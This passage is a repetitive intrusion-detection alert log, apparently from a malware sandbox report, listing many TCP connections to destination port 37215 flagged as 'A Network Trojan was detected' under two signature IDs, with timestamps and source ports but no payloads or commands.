                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.294263
                SID:2835222
                Source Port:41204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.877577
                SID:2829579
                Source Port:52724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717357
                SID:2829579
                Source Port:57386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565038
                SID:2835222
                Source Port:47174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646535
                SID:2829579
                Source Port:38316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763168
                SID:2829579
                Source Port:45708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723372
                SID:2835222
                Source Port:57194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339516
                SID:2829579
                Source Port:59818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543731
                SID:2835222
                Source Port:50940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054318
                SID:2829579
                Source Port:32970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423328
                SID:2829579
                Source Port:48176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295613
                SID:2829579
                Source Port:40690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972329
                SID:2829579
                Source Port:39440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641411
                SID:2835222
                Source Port:60804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682432
                SID:2835222
                Source Port:50568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762468
                SID:2835222
                Source Port:50374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111273
                SID:2829579
                Source Port:60190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941509
                SID:2835222
                Source Port:56880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421999
                SID:2835222
                Source Port:52370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617697
                SID:2835222
                Source Port:40276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763424
                SID:2835222
                Source Port:42648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072803
                SID:2835222
                Source Port:52870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668440
                SID:2835222
                Source Port:55366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022498
                SID:2829579
                Source Port:37512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703310
                SID:2829579
                Source Port:45824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737453
                SID:2835222
                Source Port:40364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860532
                SID:2835222
                Source Port:39342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812665
                SID:2829579
                Source Port:35978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200929
                SID:2829579
                Source Port:59710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644562
                SID:2829579
                Source Port:53588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.337758
                SID:2835222
                Source Port:60400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181762
                SID:2829579
                Source Port:41516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015791
                SID:2835222
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423514
                SID:2835222
                Source Port:34738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985251
                SID:2829579
                Source Port:37408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776040
                SID:2829579
                Source Port:58496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916802
                SID:2829579
                Source Port:60926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323712
                SID:2835222
                Source Port:35352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132907
                SID:2829579
                Source Port:52554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183285
                SID:2835222
                Source Port:35506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616630
                SID:2829579
                Source Port:45174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675404
                SID:2829579
                Source Port:34844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766530
                SID:2829579
                Source Port:45878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914195
                SID:2835222
                Source Port:53680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277824
                SID:2829579
                Source Port:38564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762330
                SID:2829579
                Source Port:52666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069044
                SID:2829579
                Source Port:44524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830868
                SID:2835222
                Source Port:50170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424695
                SID:2829579
                Source Port:39394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148947
                SID:2829579
                Source Port:42674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150384
                SID:2829579
                Source Port:47262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807864
                SID:2829579
                Source Port:54168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672990
                SID:2829579
                Source Port:35768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112114
                SID:2829579
                Source Port:45046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682910
                SID:2835222
                Source Port:56326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.199056
                SID:2835222
                Source Port:58332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643278
                SID:2829579
                Source Port:58900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984569
                SID:2835222
                Source Port:57056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763004
                SID:2829579
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094623
                SID:2835222
                Source Port:47008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942659
                SID:2829579
                Source Port:50936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.989654
                SID:2829579
                Source Port:57434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200556
                SID:2835222
                Source Port:56718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368148
                SID:2829579
                Source Port:42040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850555
                SID:2829579
                Source Port:32790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.904741
                SID:2835222
                Source Port:60226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176649
                SID:2835222
                Source Port:53306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932967
                SID:2835222
                Source Port:33648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979505
                SID:2835222
                Source Port:35746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943372
                SID:2829579
                Source Port:39682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020030
                SID:2829579
                Source Port:44538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143107
                SID:2829579
                Source Port:58182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807575
                SID:2829579
                Source Port:34768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965954
                SID:2829579
                Source Port:35412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014268
                SID:2829579
                Source Port:54502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023014
                SID:2835222
                Source Port:47938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323300
                SID:2829579
                Source Port:53394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343416
                SID:2829579
                Source Port:52138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545708
                SID:2835222
                Source Port:52312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716430
                SID:2829579
                Source Port:51242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544785
                SID:2829579
                Source Port:38216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133369
                SID:2835222
                Source Port:49184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.581942
                SID:2835222
                Source Port:45398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228328
                SID:2835222
                Source Port:48066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806151
                SID:2829579
                Source Port:57064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055639
                SID:2835222
                Source Port:38088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451813
                SID:2829579
                Source Port:36374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736311
                SID:2835222
                Source Port:47370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763758
                SID:2835222
                Source Port:56494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071076
                SID:2835222
                Source Port:47748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879938
                SID:2829579
                Source Port:46602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.932854
                SID:2835222
                Source Port:60280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339746
                SID:2835222
                Source Port:57698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367238
                SID:2829579
                Source Port:57304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132557
                SID:2829579
                Source Port:57892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808667
                SID:2835222
                Source Port:45650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968651
                SID:2829579
                Source Port:59186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859336
                SID:2829579
                Source Port:39630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942448
                SID:2835222
                Source Port:43084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701893
                SID:2829579
                Source Port:34078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186016
                SID:2829579
                Source Port:49414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183865
                SID:2829579
                Source Port:58222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.774833
                SID:2835222
                Source Port:57934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940933
                SID:2835222
                Source Port:53194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148814
                SID:2829579
                Source Port:44986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762174
                SID:2829579
                Source Port:32992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074762
                SID:2835222
                Source Port:38696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518885
                SID:2835222
                Source Port:41938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502384
                SID:2829579
                Source Port:33666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.135053
                SID:2829579
                Source Port:47198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165396
                SID:2829579
                Source Port:38792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472104
                SID:2829579
                Source Port:45778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054947
                SID:2829579
                Source Port:50178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275359
                SID:2829579
                Source Port:48496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718315
                SID:2835222
                Source Port:38896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452286
                SID:2829579
                Source Port:41772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670731
                SID:2835222
                Source Port:41326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001169
                SID:2829579
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.250838
                SID:2829579
                Source Port:41764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733627
                SID:2829579
                Source Port:57852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661364
                SID:2835222
                Source Port:59112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806813
                SID:2829579
                Source Port:33994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828836
                SID:2835222
                Source Port:39400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732578
                SID:2829579
                Source Port:52440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943850
                SID:2829579
                Source Port:37800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.905174
                SID:2835222
                Source Port:54500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422878
                SID:2835222
                Source Port:42496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448727
                SID:2835222
                Source Port:50978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132693
                SID:2829579
                Source Port:47508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898361
                SID:2835222
                Source Port:42424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518667
                SID:2829579
                Source Port:58452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967882
                SID:2835222
                Source Port:35742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670088
                SID:2835222
                Source Port:49686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503790
                SID:2829579
                Source Port:57166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717541
                SID:2829579
                Source Port:50176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662270
                SID:2829579
                Source Port:38556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916463
                SID:2829579
                Source Port:37596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381229
                SID:2829579
                Source Port:37790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860755
                SID:2835222
                Source Port:51936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181529
                SID:2835222
                Source Port:33946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670787
                SID:2835222
                Source Port:39420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163387
                SID:2829579
                Source Port:33124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229747
                SID:2829579
                Source Port:43682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182968
                SID:2835222
                Source Port:52744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.736341
                SID:2835222
                Source Port:48576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848466
                SID:2835222
                Source Port:38270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944487
                SID:2835222
                Source Port:52812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.992008
                SID:2829579
                Source Port:48130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453035
                SID:2829579
                Source Port:39130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761159
                SID:2829579
                Source Port:57662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728584
                SID:2835222
                Source Port:44822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115858
                SID:2829579
                Source Port:36156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.516899
                SID:2829579
                Source Port:37410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069499
                SID:2829579
                Source Port:43138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806972
                SID:2835222
                Source Port:53532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518828
                SID:2835222
                Source Port:45238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029490
                SID:2829579
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671014
                SID:2835222
                Source Port:49844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827973
                SID:2829579
                Source Port:57176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966011
                SID:2829579
                Source Port:45460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411044
                SID:2835222
                Source Port:49856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.131382
                SID:2829579
                Source Port:34372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325059
                SID:2835222
                Source Port:40454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662674
                SID:2829579
                Source Port:40518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324465
                SID:2835222
                Source Port:46754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340171
                SID:2835222
                Source Port:36188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772359
                SID:2829579
                Source Port:50268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424724
                SID:2835222
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134818
                SID:2835222
                Source Port:37114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701611
                SID:2829579
                Source Port:47080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847979
                SID:2835222
                Source Port:57450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164042
                SID:2835222
                Source Port:56344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243488
                SID:2829579
                Source Port:33470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295004
                SID:2829579
                Source Port:34628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625231
                SID:2835222
                Source Port:35506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965393
                SID:2835222
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340097
                SID:2835222
                Source Port:59422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704643
                SID:2829579
                Source Port:44384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072997
                SID:2829579
                Source Port:36490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761584
                SID:2835222
                Source Port:48522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245783
                SID:2829579
                Source Port:53136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737715
                SID:2829579
                Source Port:47744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290951
                SID:2829579
                Source Port:37888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810168
                SID:2829579
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017719
                SID:2829579
                Source Port:51000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289734
                SID:2835222
                Source Port:46870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618233
                SID:2829579
                Source Port:33634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383671
                SID:2835222
                Source Port:42984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020343
                SID:2835222
                Source Port:40052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338412
                SID:2835222
                Source Port:34504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704824
                SID:2835222
                Source Port:44646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224891
                SID:2829579
                Source Port:53522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615011
                SID:2835222
                Source Port:41440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012090
                SID:2829579
                Source Port:43812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985454
                SID:2829579
                Source Port:46634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.010485
                SID:2829579
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094362
                SID:2835222
                Source Port:40832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
